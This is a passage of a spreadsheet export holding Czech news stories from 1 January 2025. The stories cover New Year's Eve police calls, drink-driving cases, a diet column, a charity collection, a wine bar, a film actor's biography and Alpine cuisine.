vystřídalo – s obligátním přáním zdraví a všeho dobrého – pěkných pár návštěv; což se ukázalo modelem velmi příjemným. Pro mne především proto, že mnoho z nich nemám příliš příležitostí vídat. Den předem a dopoledne jsem stihla nachystat potřebné, pročež jsem mezi polednem a druhou hodinou odpolední mohla s přáteli a čtyřnožcem na mrazivou vycházku. Ostatní zvaní se zbaběle vymluvili. Pán domu během mé nepřítomnosti připravil maso a narazil soudek s pivem a Vineou pro děti, což nám v cíli přišlo vhod. Příchozí ocenili manželovy masné variace, stejně jako můj sváteční bramborový salát s červenou řepou. Tradičně jsme poněkud neodhadli množství jídla, pročež v úvodu roku nového budeme zásoby ještě dlouho dojídat. A na domácí výstavce tlustostěnných lahví přibylo opět pěkných pár kousků. Poslední z návštěv od nás odcházela kolem desáté hodiny večerní. Další dvě hodiny jsem vydržela vzhůru jen kvůli nejmladšímu synkovi, který si chtěl o půlnoci připít. Připíjeli jsme ze sklenic na šampaňské vizuálně podobnou točenou limonádou. Rok jsem uzavírala střízlivě a smířeně, po všech letošních změnách a událostech s překvapivým pocitem, že jsem připravená téměř na vše. Autor: Jana Kozubíková Autor Jana Kozubíková</t>
  </si>
  <si>
    <t>20250101_73_3697116867_41d0cf30384e15b20c39.html</t>
  </si>
  <si>
    <t>41d0cf30384e15b20c39</t>
  </si>
  <si>
    <t>Silvestr v Pardubicích: Záchytka plná, chuligáni v ulicích</t>
  </si>
  <si>
    <t>Silvestr v Pardubicích : Záchytka plná, chuligáni v ulicích Poslední noční služba roku 2024 v Pardubicích byla pro strážníky pestrá. Hned první výjezd na krátce po začátku služby byl na 14letého chlapce, který byl pod silným vlivem alkoholu . Nadýchal 1,55 promile a vzhledem ke stavu, ve kterém se nacházel, počkal v péči záchranné služby do příjezdu zákonných zástupců. Pardubicko „Poté přišla špatná zpráva. Pardubická záchytka vyčerpala své kapacity hned z kraje večera. Adeptem na umístění totiž byl opilý muž z Ostravska , který hlídky strážníků i policistů zaměstnával průběžně od časného večera až do půlnoci. Svým nesnesitelným jednáním vyvolal postupně několik konfliktů, kde pak ještě následnými oznámeními a stížnostmi zaměstnával strážníky a policisty, na které chrlil urážky. Toto počínání by mu normálně zaručilo místo na záchytné stanici, jenže ta už byla plná. Postupem večera se tento problémový muž odebral na nádraží a jeho počínáním se nakonec bude zabývat správní orgán,“ uvedl mluvčí pardubických strážníků Jiří Sejkora. Prvními výjezdy roku 2025 bylo probuzení a vykázání opilého muže z vagonu v železničním depu u hlavního nádraží. Vzápětí dvě hlídky vyjely k požáru kontejneru na sídlišti Dubina. Strážníci před příjezdem hasičů zkontrolovali, že se v kontejnerovém stání nenachází žádné osoby a odtáhli požárem nezasažené popelnice od ohně. O zbytek se pak postarali pardubičtí hasiči . Pardubicko Chvíli po půlnoci museli policisté a strážníci rychle krotit vášně na třídě Míru. Tam do hostů před barem začala strkat procházející skupina 15 fotbalových chuligánů mířících na vlak do Prahy . Strážníci po tomto incidentu tuto skupinu doprovázeli až k nádraží, aby nedošlo k dalším konfliktům. Těsně před třetí hodinou ráno vyjeli strážníci na Signál v tísni . Seniorka ročník 1941 si pomocí nouzového tlačítka přivolala pomoc. Strážníci vstoupili do bytu, zkontrolovali ženin stav a vzhledem k seznamu obtíží přivolali na místo posádku záchranné služby. Řidič v Pardubicích nechtěl čekat, až popeláři udělají svoji práci. | Video: se svolením Policie ČR Autor: Jiří Tůma Autor Jiří Tůma</t>
  </si>
  <si>
    <t>7300</t>
  </si>
  <si>
    <t>20250101_74_3697095198_7bb9d8c6979c82a312fd.html</t>
  </si>
  <si>
    <t>7bb9d8c6979c82a312fd</t>
  </si>
  <si>
    <t>Nový rok je čistý jak nepopsaný list. Co na něj pak napíšu, to tam bude</t>
  </si>
  <si>
    <t>Nový rok je čistý jak nepopsaný list. Co na něj pak napíšu, to tam bude Tak co, jdete nakupovat jogurty, tvaroh a odtučněné mléko? Začínáte běhat, cvičit, učit se jazyky? Nechci vás odrazovat, ale mám zkušenost, že v půlce ledna vás to přestane bavit. Vařím už nějaký čas chutně a zdravě. Dávno vím, že pokud nechci přibírat, nemá cenu začít dnes s jogurty, které jsem nejedla celý rok. Za pár dní mě na ně stejně přejde chuť. Stejně nechápu, kde se vzalo přesvědčení, že když budu jíst jogurty, zhubnu. Jogurty a zakysané mléčné výrobky jsou zdravé spíš kvůli vápníku a snad proteinu, a také pro dobré trávení. Kdo je dokáže jíst místo jiného jídla, jistě zhubne, ale chceme se tak trápit? Jogurt je dobrá dopolední svačina nebo součást zdravé snídaně. Jogurt bez sladkého džemu pochopitelně. Tvaroh opět bez cukru není moc dobrý, ale zasytí, nicméně večeři jím nenahradím. A když budu mít hlad, bude se mi špatně spát, ráno vstanu a první, na co pomyslím, je jídlo. Tohle není cesta. Cesta je, jak říkali už naši předkové. Snídej sám, obědvej s přítelem, večeři dej nepříteli. Nebo: Jez do polo syta. Už nedodávám, pij do polo pita, leda by se to týkalo alkoholu . Vody bychom měli vypít mnozí víc, než vypijeme, ale rozhodně ne čtyři litry, jak se nám před pár lety snažili vnutit producenti vod v umělohmotných lahvích. V dobách mé novinařiny jsem se často stýkala s Američany. Bavilo mě, jak tvrdili, že je nutné se před každým jídlem napít, že pak méně sníme. Taky do sebe házeli vitaminy všeho druhu v obrovském množství, doufali, že se tak udrží mladí a krásní. Ale byli fajn, zažila jsem s nimi zajímavé večery, poznala díky nim spoustu pražských restaurací a viděla, jak jedí. Někde jsem četla, že bychom měli každou hodinu vypít sklenici vody, že to tak stačí. Nikde jsem nečetla, že voda nahradí jídlo. Tohle všechno mě začalo zajímat, když jsem se po nástupu do důchodu začala potýkat s nabývajícími kilogramy. Pohodlíčko, čas na vaření a mě vaření baví, a taky kamarádství s jednou úžasnou autorkou kuchařek, s níž jsem napřed dělala rozhovor do novin a pak jsme se skamarádily a já se stala ochutnávačkou jejích receptů. Upekla dort, vzala si kousek a zbytek mi dala. Kila přibývala. Pak jsem vážně onemocněla a brala kortikoidy. Nikdo ze starých známých mě nepoznal. Dnes by mě titíž lidé opět nepoznali, ale z opačného důvodu. Jednou jsem tady psala, že cvičím s cvičitelkou podle videí, která si kupuju. Jsou k nim i jídelníčky, ale už je nepotřebuju. Brzy jsem pochopila, v čem je finta. Už jsem to tu napsala. Nepřejídat se, jíst pravidelně, zdravě – a chutně! Pak si občas můžu dovolit i něco, co se považuje za nezdravé, jako třeba klobása k novoroční čočce, nebo ty smažené koblihy, byť jsou z tvarohu. I moje cvičitelka nám občas napíše, že v určitý den můžeme zbaštit, co chceme v jakémkoli množství. My už víme, že nám to druhý den pěkně vykompenzuje náročnější půlhodinkou. Každý člověk se základní školou ví velmi dobře, co je zdravé a dobré, a když chce, naučí se to kombinovat ve své stravě. Pak si nemusí dávat na Nový rok předsevzetí, že zhubne, protože tak to nefunguje. Funguje to tak nějak postaru, jak žili naši předkové. Měli hodně pohybu a jedli střídmě. Ale tak, aby neměli hlad. Hlad je hrozný, dá se chvíli vydržet, ale pak přijde okamžik, kdy nás tak štve, že sníme, na co přijdeme a kdo v tom pokračuje… Však víte. A tak vám přeji, abyste si nemuseli dávat žádná předsevzetí na Nový rok, ale aby byl celý váš rok plný zdravých, rozumných rozhodnutí, která se projeví na vašich postavách, náladách, na vaší vitalitě čili chuti do života. Přejedený unuděný člověk chutí do života moc neoplývá, zato ten, kdo zná míru, umí žít pestře a je spokojený. Tak ať jste vy všichni moc spokojení.</t>
  </si>
  <si>
    <t>20250101_75_3697050241_4d5d6e63a8a636cf71cf.html</t>
  </si>
  <si>
    <t>4d5d6e63a8a636cf71cf</t>
  </si>
  <si>
    <t>Opilý jezdec na elektrickém přepravníku řádil v Plzni</t>
  </si>
  <si>
    <t>Opilý jezdec na elektrickém přepravníku řádil v Plzni 1. 1. 2025 Rebeka Vörösová KRIMI, Plzeňský kraj Zdroj: Městská policie Plzeň PLZEŇ – Plzeňští strážníci zastavili muže, který na elektrickém přepravníku prosvištěl na červenou. Postupně však zjistili, že to není zdaleka jeho jediný prohřešek. Pozornost strážníků v Plzni upoutal jezdec na osobním přepravníku, který se rozhodl ignorovat pravidla. Na ulici Otýlie Beníškové nejdřív svižně předjel auto a na křižovatce Rooseveltovy ulice a sadů 5. května bez mrknutí oka projel na červenou. Hlídka ho zastavila hned za křižovatkou. Za řídítky seděl devětatřicetiletý muž, který spěchal do práce. Přiznal, že o červené na semaforu věděl, ale že to chtěl stihnout. Jenže při rozhovoru to začalo být ještě zajímavější, strážníci pojali podezření, že muž má něco upito. A taky že ano. Dechová zkouška ukázala 0,77 promile a muž se přiznal ke čtyřem pivům . K tomu se přidal další problém. Přepravník, schopný jet až 80 km/h, neměl povinné pojištění. Na dvoukilometrové trase stihl muž porušit pravidla hned šestkrát. „Na místo byla přivolána i státní policie, která nechala celou záležitost k dořešení městské policii,“ uvedla mluvčí městské policie Tereza Schliková. Vozítko zůstalo stát, jeho řidič pokračoval domů po svých a případem se teď bude zabývat správní orgán. KRIMI PLZEŇSKÝ KRAJ – Plzeňští kriminalisté pátrají po šestašedesátiletém muži, po kterém je vyhlášeno celostátní pátrání. Pohřešovaný byl naposledy viděn dne 14. března 2023 v 11 […] KRIMI PLZEŇ – Policisté ve službě nikdy neví, s kým se setkají, a i když jedou někomu na pomoc, může na ně čekat nepříjemné překvapení. Své […] KRIMI Autor: Rebeka Vörösová Autor person Rebeka Vörösová Rubrika transition_slide KRIMI</t>
  </si>
  <si>
    <t>20250101_76_3696993913_5b39820afcd20b752e67.html</t>
  </si>
  <si>
    <t>5b39820afcd20b752e67</t>
  </si>
  <si>
    <t>Vinotéka Cibulka v Praze</t>
  </si>
  <si>
    <t>Vinotéka Cibulka v Praze Vinotéka moravského rodinného vinařství Cibulka v boční uličce náměstí Jiřího z Poděbrad (Laubova, Praha 3 ) nabízí prodej vína přes ulici, ale také posezení u sklenky moravského vína s drobným občerstvením. Pro rodinné i firemní oslavy, pro milenecké schůzky, pracovní setkání je zde Vinotéka Cibulka Laubova 4, Praha 2. Degustace vín po předchozím objednání. Vína z rodinného vinařství, jsou v Praze za skladové ceny. Počasí: dnes 6 °C Rychlost větru: 10 m/s Oblačnost: 34 % Tlak: 1003 hPa Vlhkost: 86 % Rychlost větru: 9 m/s Oblačnost: 88 % Tlak: 1017 hPa Vlhkost: 64 % Rychlost větru: 8 m/s Oblačnost: 96 % Tlak: 1020 hPa Vlhkost: 61 % Rychlost větru: 7 m/s Oblačnost: 100 % Tlak: 1032 hPa Vlhkost: 72 % Rychlost větru: 3 m/s Oblačnost: 31 % Tlak: 1041 hPa Vlhkost: 67 % Rychlost větru: 2 m/s Oblačnost: 100 % Tlak: 1035 hPa Vlhkost: 52 % Rychlost větru: 2 m/s Oblačnost: 100 % Tlak: 1034 hPa Vlhkost: 96 % Rychlost větru: 1 m/s Oblačnost: 100 % Tlak: 1037 hPa Vlhkost: 78 % &amp;lt; &amp;gt;</t>
  </si>
  <si>
    <t>71330</t>
  </si>
  <si>
    <t>20250101_77_3697010149_1f216d03a8d165c1a425.html</t>
  </si>
  <si>
    <t>1f216d03a8d165c1a425</t>
  </si>
  <si>
    <t>Baba Jaga z Mrazíka byla muž: Herec divoce nasával, pohádku ale zachránil před tragédií</t>
  </si>
  <si>
    <t>Baba Jaga z Mrazíka byla muž: Herec divoce nasával, pohádku ale zachránil před tragédií Dnes již legendární sovětská pohádka Mrazík nesmí na konci roku chybět v řadě českých, moravských a slezských domácností. Ne úplně moc se ale ví, že představitelem role Baby Jagy byl ve skutečnosti muž. Podle ČSFD ho až do konce života podezírali ze skrývání orientace. Jinak ale je velkým hrdinou samotného natáčení pohádky. Mrazík: Baba Jaga byla muž Georgij Milljar přišel na svět v roce 1903, s ohledem na budoucí dějinné události se narodil do pro něj bohužel zámožné rodiny: tatínek byl francouzský inženýr, maminka dědička průmyslového impéria a zlatých dolů. Mohl se mít až do konce života jako sultán, ale na světě se zkrátka objevil ve špatné době a na špatném místě. Tatínek Franz de Millieu zemřel již v roce 1906, takže si ho chlapec vůbec neužil. Ostatně i herec byl de Millieu, ale aby pak soudruhy příjmení nedráždilo, však za buržoazní původ se trestalo, nechal si ho raději změnit. Když pak v mládí Georgije proběhla Velká říjnová socialistická revoluce, kdy se vlády chopili krvelační komunisté, rodina samozřejmě přišla o veškerý majetek . Ještě předtím mu ale peníze zajistily řádnou výchovu, soukromého učitele i výuku řady světových jazyků. Zachránil i Popelku K divadlu se vlastně dostal náhodou: pracoval jako kulisák, když onemocněla představitelka Popelky, hbitě za ni zaskočil, neboť čirou náhodou uměl její part kompletně zpaměti, a předurčil se tak historicky i pro ženské role v pohádkách. Ve filmu debutoval v roce 1938, když si zahrál cara v titulu O plačtivé princezně . Nějak ho to vroucně táhlo k pohádkám, takže kývl snad na každou, kterou mu nabídli. Zákonitě tedy neodmítl ani Babu Jagu v Mrazíkovi (1964). Web Metro tvrdí, že herec si na roli sám navrhl líčení i kostým a na place všechny, kteří s tím měli co do činění, dost peskoval. Chtěl být dokonalá babice. U nás by možná postava nebyla ani tak populární, kdyby ji dokonale nenadaboval (stejně jako Louise de Funèse ) pan František Filipovský . Komplikace při natáčení Ohledně natáčení se ví například to, že kvůli některým scénám bylo třeba najít lokace plné hord sněhu, ty se však v místě plánovaného filmového placu nenacházely, takže téměř celý rozpočet padl „za vlast“ kvůli přesunu štábu k Murmansku za polární kruh. Peníze pak už nebyly na nic víc. A jídlo na hostině údajně rekvizitáři natírali petrolejem, aby jej hladoví herci nespořádali před poslední klapkou. Možná i kvůli větší zimě a problémům si musel režisér dávat mnohem větší pozor na problém Georgije s alkoholem , aby se nechtěl příliš moc zahřívat. Byl pověstný svou vroucí láskou k alkoholu . Místo průšvihu se zodpovědností naopak ale celou pohádku zachránil: když prasklo potrubí v domě, kde bydleli a ve sklepě tu skladovali filmové kotouče, sám v mrazu a bosky vybíhal ven a zachraňoval vše, co dosud natočili. Díky tomu práce nepřišla vniveč a napospas živlu. Nedůvěra Milljar žil celý život sám, až ve vysokém věku, v pětašedesáti, se oženil s šedesátiletou Marijou. Asi tak chtěl utnout v té době kariéru likvidující zvěsti o své skrývané pravé sexuální orientaci . O jeho dalším životě se moc neví. Jen to, že pouze pár dnů před devadesátinami 4. června 1993 vydechl naposledy. Na sklonku života tedy zažil pád režimu, který jeho rodinu připravil o vše. Pro české diváky bude už vždy sice zákeřná, ale vlastně roztomile srandovní Baba Jaga... Taťána Makarenko odkryla pozadí konfliktu se Samem Dolcem. Rozešli se ve zlém, kráska mluví o zradě Autor: David Zápal Autor David Zápal Rubrika transition_slide Mrazík</t>
  </si>
  <si>
    <t>20250101_78_3697022092_1d95ca1ef4f8320662e9.html</t>
  </si>
  <si>
    <t>1d95ca1ef4f8320662e9</t>
  </si>
  <si>
    <t>Poláci přichází s doživotním zákazem řízení</t>
  </si>
  <si>
    <t>Poláci přichází s doživotním zákazem řízení 1. 1. 2025 2 min. čtení diskuze ( 0 ) Polská vláda pracuje na novinkách, které se dotknou řidičů. Pro největší prohřešky momentálně tamní politici přichází i s takzvaným doživotním zákazem řízení. Cíl je jasný – snížit počet mrtvých na silnicích, který je v Polsku dlouhodobě vysoký. Články na téma dopravní předpisy v Polsku : Alkohol za volantem v Polsku - jaké jsou sankce? Dopravní předpisy v Polsku Polsko a řidičák na kolo pro děti Zabavení automobilu v Polsku : Komu se to může stát? Dálnice a rychlostní silnice v Polsku Dopravní předpisy Polsko – čím se liší? Dopravní předpisy Polsko vs. Česko Pokuty v Polsku – rychlost a parkování Maximální rychlosti cestou do Polska Jaká je maximální rychlost na polských silnicích Chystáte se do Polska autem? Pozor na specifika, která zde platí Polsko a doživotní zákaz řízení - právě čtete Sousední Polsko se dlouhodobě potýká s poměrně vysokým počtem úmrtí na silnicích. Tamní politici se ale nyní rozhodli tomuto smutnému fenoménu čelit. Připravili několik novinek, které se týkají trestání. Na nich tamní ministerstva pracují a už brzy by se měly objevit i v samotné praxi. Nejprve se polští motoristé musí připravit na to, že účast na nelegálních závodech nebo jen spoluúčast na jejich pořádání se nově stane trestným činem. Se zásadními změnami musí počítat i motoristé bez řidičského oprávnění. Polsko totiž dlouhodobě bojuje s tím, že řada motoristů předchozí rozhodnutí o odebrání řidičského průkazu ignoruje. Také čtěte 20. 12. 2024 Jakub Mokříš Tipy a rady Doživotní zákaz řízení a podrobnosti I proto polské ministerstvo pro infrastrukturu ve spolupráci s tamním ministerstvem spravedlnosti pracuje na konkrétním znění, které by umožňovalo zabavovat řidičský průkaz na doživotí v případě, že motorista na daném úseku poruší stanovenou maximální rychlost o více než 50 kilometrů v hodině. Někteří polští politici ale chtějí, aby se tato novinka nevztahovala na dálnice. Jedná se totiž o silniční komunikace, kde se za běžné situace nevyskytují cyklisté ani chodci. Pokud by tedy řidič na polské dálnici jel v budoucnu třeba rychlostí 200 kilometrů v hodně, i nadále mu tak nejspíš bude hrozit jen tučná pokuta a trestné body. V Polsku se zároveň pracuje i na řidičském průkazu pro sedmnáctileté, který je již několik měsíců platný i v České republice . Podobně jako u nás tedy v Polsku budou mít mladší ročníky možnost řídit automobil po boku zkušeného dospělého a omezenou rychlostí. Také čtěte 21. 12. 2024 Vendula Flassig Vrablová Aktuality K posledním velkým změnám došlo v Polsku v roce 2022 K posledním výrazným změnám v pokutách na silnicích se polští zákonodárci odhodlali v roce 2022. Tehdy přišli s novým sazebníkem pokut, který výrazně zpřísňuje tresty pro řidiče, kteří se dopustí nejzávažnějších přestupků. Mnohem přísněji se trestají i provinění, která jsou ze strany motoristů spáchána opakovaně. Nyní platí, že o řidičský průkaz mohou řidiči v Polsku přijít kupříkladu z důvodu porušení zákazu jízdy po komunikaci pro chodce, předjíždění vozidla na přechodu pro chodce, nebo třeba v situaci, kdy motorista nedá v rozporu se svou povinností přednost chodci. U všech těchto přestupků ale platí, že zásada zadržení průkazu na místě se neuplatňuje a rozhodnutí je až na kontrolních orgánech. Jsou ale i samozřejmě další možnosti, kvůli kterým může motorista v Polsku ztratit své řidičské oprávnění. Sem patří zejména překročení maximálního přístupného počtu trestných bodů nebo ztráta požadované kvalifikace. Autor: Jiří Lacina Autor person Jiří Lacina Rubrika transition_slide Aktuality</t>
  </si>
  <si>
    <t>44720</t>
  </si>
  <si>
    <t>20250101_79_3697034194_9bfe2be37c6367a6539e.html</t>
  </si>
  <si>
    <t>9bfe2be37c6367a6539e</t>
  </si>
  <si>
    <t>Deník alkoholičky | Co se skrývá za filmem? Pohled na závislosti s psycholožkou Pavlínou Doležalovou</t>
  </si>
  <si>
    <t>Deník alkoholičky | Co se skrývá za filmem? Pohled na závislosti s psycholožkou Pavlínou Doležalovou Lukáš Eder FC Podcast V novém dílu podcastu se setkáváme s psycholožkou Pavlínou Doležalovou, která se věnuje komplexním tématům spojeným s alkoholismem, závislostmi a tím, jak tyto problémy ovlivňují vztahy a rodiny. Pavlína otevřeně hovoří o důležitosti sebereflexe, jak se vypořádat s těžkými životními situacemi a jak si uvědomit, že skutečná změna začíná ve chvíli, kdy si přiznáme, že máme problém. Je to rozhovor o vděčnosti, uzdravení a hledání cesty ke změně. „ Alkohol je v naší společnosti tolerovaná droga, která ale způsobuje čím dál více problémů,“ Říká Pavlína Doležalová. Poslechněte si ukázku rozhovoru, kde se budeme bavit o tom, jak alkoholismus ovlivňuje nejen jednotlivce, ale i jejich blízké a celkové rodinné vztahy. Pavlína nabízí hluboký pohled na téma závislostí a sebereflexe, a jak mohou změny začít právě v sobě. Ukázka rozhovoru s Pavlínou Doležalovou „Když si uvědomíme, jaký dar máme v přítomnosti, jak málo stačí k tomu, abychom byli opravdu šťastní a vděční, všechno začne být jasnější.“ – Pavlína Doležalová Pavlína se v rozhovoru zaměřuje na vděčnost jako nástroj pro překonávání těžkých životních situací. Vděčnost, jak říká, není jen o slovech, ale o změně pohledu na svět. Když si začneme vážit malých věcí a uvědomíme si, co všechno máme, dokážeme změnit náš přístup k životu i těm nejtěžším výzvám. Doležalová podotýká, že vděčnost může být klíčovým momentem na cestě ke změně, k uzdravení a k vnitřnímu klidu. Co si odnesete z celého rozhovoru Hloubkový pohled na alkoholismus: Pavlína Doležalová sdílí své zkušenosti s tím, jak alkoholismus rozkládá rodinné vztahy a co to znamená pro duševní zdraví. Praktické rady pro ty, kdo se potýkají se závislostí: Jak rozpoznat, že máte problém, a jak začít pracovat na změně. Sebereflexe jako klíč k uzdravení: Doležalová vysvětluje, proč je sebereflexe základním kamenem pro jakoukoli změnu v životě. Psychošmejdi a nebezpečí falešné terapie: Pavlína varuje před neodbornými terapeuty a šarlatány, kteří využívají zranitelnosti klientů a nabízí jednoduché, ale nereálné řešení problémů. Různé podoby závislostí: Probereme nejen alkoholismus, ale i závislost na sociálních sítích a jak se k ní postavit. Kognitivně-behaviorální terapie (KBT): Jak KBT techniky pomáhají v terapii a co mohou znamenat pro dlouhodobou změnu v chování a myšlení. Rodinné konstelace a jejich vliv na vnímání závislostí: Jak rodinné konstelace a systemické terapie mohou pomoci pochopit vzorce chování, které nás vedou k závislostem, a jak je změnit. Vděčnost jako nástroj pro osobní růst: Jak může jednoduché uvědomění si hodnoty každodenních věcí vést k vnitřní proměně. Chcete se dozvědět více o tom, jak se vyrovnat se závislostmi a jak vděčnost může změnit váš život? Celý rozhovor s Pavlínou Doležalovou si můžete poslechnout v podcastu níže. Nezapomeňte se přihlásit k odběru a zůstat s námi v kontaktu. Každý nový díl přináší inspiraci a nástroje pro osobní růst a cenné zkušenosti z oblasti duševního zdraví a mezlidských vztahů Celý rozhovor s psycholožkou Pavlínou Doležalovou pro předplatitele Plná verze článku je k dispozici pouze předplatitelům Celé rozhovory Myšlením na vrchol Přístup k archivu celého podcastu Uzamčené články Lukáše Edera Digitální archiv magazínu FC Workshop (od října 2024) Celé rozhovory s hosty oficiálního podcastu firstclass.cz Záznamy besed s odborníky Možnost pozvat hosta na přání Předplatit od 249 Kč/měsíc Autor: Lukáš Eder Autor person Lukáš Eder Rubrika transition_slide Mezilidské vztahy</t>
  </si>
  <si>
    <t>2580</t>
  </si>
  <si>
    <t>2890</t>
  </si>
  <si>
    <t>20250101_8_3698309621_ba5dc7b363ad76ce0dde.html</t>
  </si>
  <si>
    <t>ba5dc7b363ad76ce0dde</t>
  </si>
  <si>
    <t>Opilý řidič narazil do domu</t>
  </si>
  <si>
    <t>Opilý řidič narazil do domu 1. ledna 2025 Více než dvě promile alkoholu nadýchal dvaatřicetiletý řidič, který v pátek 20. prosince boural v Gogolově ulici v Jeseníku . Auto vyjelo mimo silnici, kde narazilo do domu. Co bylo příčinou nehody teď policie prověřuje. Opilý řidič narazil autem do domu. Z nehody vyvázl bez zranění. Foto: pčr „Nehoda se obešla bez zranění. Škoda byla předběžně vyčíslena na 100 tisíc korun,“ uvedla mluvčí policie Ivana Skoupilová. K bouračce došlo kolem půl jedenácté večer. Přivolaná policejní hlídka řidiči nejprve naměřila 2,23 promile a při opakované zkoušce 2,33. Řidič je podezřelý z trestného činu „Policisté muži na místě zadrželi řidičský průkaz. Řidič je podezřelý z trestného činu ohrožení pod vlivem návykové látky,“ dodala policejní mluvčí. Autor: Jaroslav Kropáč INZERCE Autor: Jaroslav Kropáč Autor person Jaroslav Kropáč</t>
  </si>
  <si>
    <t>20250101_80_3696966715_690749b24b758f607b14.html</t>
  </si>
  <si>
    <t>690749b24b758f607b14</t>
  </si>
  <si>
    <t>Vilma Cibulková vyráží dech. Takhle se k ní chovala slovenská policie</t>
  </si>
  <si>
    <t>Vilma Cibulková vyráží dech. Takhle se k ní chovala slovenská policie Provozovatelem serveru newsbox.cz je mediální skupina INCORP a. s., IČ: 28356829 Sledujte nás na | Zaznamenali jste událost? Máte pro nás důležitou zprávu, příběh, fotografie, videa? Pošlete nám mail na: redakce@newsbox.cz Nejlepší z vás odměníme Vilma Cibulková vyráží dech. Takhle se k ní chovala slovenská policie Vilma Cibulková , foto: Česká televize 1. ledna 2025 16:55 Sdílej: Herečka Vilma Cibulková (61) se ocitla v nepříjemné situaci, když byla na Slovensku odsouzena k dvouměsíční podmínce a pokutě ve výši 75 000 korun za řízení pod vlivem alkoholu . Policie podle jejích slov stanovila výši pokuty na základě jejího příjmu. Incident se odehrál krátce před Vánoci, kdy byla Cibulková na Slovensku zadržena a strávila dva dny v cele předběžného zadržení. Podle jejích slov probíhaly výslechy až v nočních hodinách. „Při nočním procesu, kdy jsem byla vyslýchána po čtvrté hodině ráno, ze mě jenom vymáčkli, kolik beru měsíčně. To potřebovali vědět. A podle toho se pohybovala sankce,“ uvedla herečka pro deník Blesk. Zpočátku herečka označovala rozhodnutí soudu za spravedlivé a uváděla, že sankce přebírá s plnou zodpovědností. „Vzdala jsem se odvolání, rozhodnutí je v právní moci,“ prohlásila. Později však změnila názor a kritizovala postup slovenské policie. „Veškeré jejich pochybení jsem přetáhla na sebe, proto jsem zaplatila tolik,“ dodala. Cibulkovou zastavila trnavská policie nad ránem, kdy dechová zkouška odhalila přítomnost dvou promile alkoholu v krvi. Podle jejích slov se v té době pohybovala pouze v areálu nemocnice v Trnavě a nikomu neublížila. „Pohybovala jsem se pouze v areálu nemocnice. Nikomu jsem neublížila,“ hájila se herečka, která nyní čelí tříletému zákazu řízení na Slovensku . Cibulková uvedla, že se celá situace odehrála před oddělením geriatrie, kam dorazila na žádost rodiny, aby doprovodila blízkou osobu na její poslední cestě. K otázce týkající se množství alkoholu v krvi však odkazuje na soudní spis. „Ostatní údaje jsou zaneseny v soudním spise,“ dodala. Vilma Cibulková se v minulosti netajila svým bojem se závislostí na alkoholu , kvůli níž podstoupila léčbu v pražských Bohnicích . Přestože tvrdí, že v této situaci nikoho neohrozila, incident znovu otevřel otázky spojené s jejími osobními problémy.</t>
  </si>
  <si>
    <t>20250101_81_3697433799_b8668c00ea6944430be4.html</t>
  </si>
  <si>
    <t>b8668c00ea6944430be4</t>
  </si>
  <si>
    <t>Při Tříkrálové sbírce v hradecké diecézi vyjdou do ulic tisíce koledníků 1. ledna 2025 16:50 Sdílet článek ilustrační snímek | foto: Metro.cz Téměř 5000 kolednických skupinek vyjde v následujících dnech do ulic měst a obcí na východě Čech , aby od lidí získaly příspěvky do pokladniček Tříkrálové sbírky. Sbírka potrvá do 14. ledna. Při posledním ročníku Tříkrálové sbírky loni v královéhradecké diecézi, která zahrnuje Královéhradecký, Pardubický a části sousedních krajů, lidé darovali rekordních 27,8 milionu korun. ČTK o tom dnes informovala Jana Karasová z Diecézní charity Hradec Králové . V Pardubicích sbírku zahájí v pondělí 6. ledna v 09:30 na Pernštýnském náměstí, kde královským trojicím požehná pomocný biskup Josef Kajnek . Městem také projedou tři královny na koních a nebude chybět hudební vystoupení. V Hradci Králové dostanou koledníci požehnání na cestu od generálního vikáře Jana Paseky v úterý 7. ledna v 08:00 v katedrále svatého Ducha. Jako koledníci se do Tříkrálové sbírky zapojí školáci, skauti, farníci i rodiče s dětmi. Peníze budou vybírat do zapečetěných pokladniček. Přispět bude možné také prostřednictvím pevných kasiček v charitních zařízeních, kostelech, na úřadech či v obchodech, on-line na webu sbírky či pomocí dárcovské SMS. Koledování doprovodí řada akcí, například koncerty a průvody, živé betlémy a různé hry. Tradiční průvod tří králů s koňmi a živý betlém zahájí sbírku v Poličce a v Humpolci v sobotu 11. ledna. Průvod tří králů na koních projde také Českou Skalicí již v sobotu 4. ledna. Tříkrálové koncerty budou v Trutnově , Červeném Kostelci, Kutné Hoře, Ústí nad Orlicí , České Třebové , Horní Čermné nebo v Dobrušce . "V Litomyšli vyrobili k 25. výročí sbírky speciální tříkrálové pivo a koledníci vyrazí do ulic s ručně odekorovanými taškami. Kino pro koledníky za odměnu chystají v Hradci Králové , Jičíně , Trutnově , Chrudimi či Litomyšli , v Kutné Hoře bude i tříkrálový guláš," uvedla Karasová . Charita pro koledníky také připravila novou kolednickou písničku od hradeckého písničkáře Michala Horáka. Výtěžek sbírky půjde na pomoc nemocným, handicapovaným a dalším potřebným především v regionech, kde se sbírka koná. Například hradecká charita ze sbírky podpoří službu domácí hospicové péče a nedávno zahájenou výstavbu lůžkového hospice ve Stěžerách. Pardubická charita použije vykoledované peníze na stavbu Centra sociálních služeb v Holicích, kde bude mít zázemí odlehčovací služba a mobilní hospic. Tříkrálová sbírka je největší dobročinnou sbírkovou akcí v České republice . Poprvé ji uspořádali v roce 2000 v olomoucké arcidiecézi. O rok později se Tříkrálová sbírka rozšířila po celé zemi. Autor: ČTK Témata: Okres Hradec Králové (město) | Aktuální zprávy, články a informace Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_82_3696901711_6f7154c1b8db275e88fb.html</t>
  </si>
  <si>
    <t>6f7154c1b8db275e88fb</t>
  </si>
  <si>
    <t>Hit alpské kuchyně. Zasytí vás na dlouhé hodiny a příjemně zahřeje.</t>
  </si>
  <si>
    <t>Hit alpské kuchyně. Zasytí vás na dlouhé hodiny a příjemně zahřeje. 1 ledna, 2025 Time to Read: - words Chladná zima vybízí k hledání pokrmů, které vás nejen zahřejí, ale také navodí jedinečnou atmosféru. Alpská kuchyně s aromatickým fondue, sýrovým raclette a sytými dušenými pokrmy je dokonalou inspirací pro zimní večery. Objevte chutě přímo z horských rájů a přeneste je k sobě domů! Alpská kuchyně je typickým zimním komfortním jídlem: vydatným, hřejivým a plným chuti. Je inspirována drsným klimatem horských oblastí a jejím základem jsou jednoduché místní suroviny, jako je sýr, brambory a bylinky. Je to kuchyně určená k přežití mrazivých dnů a zároveň ke společnému stolování. Fondue, raclette, husté polévky a aromatické dezerty jsou jen některé ze specialit, které jsou v zimních měsících velmi oblíbené. V tomto článku vás seznámíme s tradičními pokrmy tohoto regionu a ukážeme vám, jak vnést alpský nádech do vaší kuchyně. Fondue je symbolem alpské kuchyně Fondue je jedním z nejznámějších pokrmů alpské 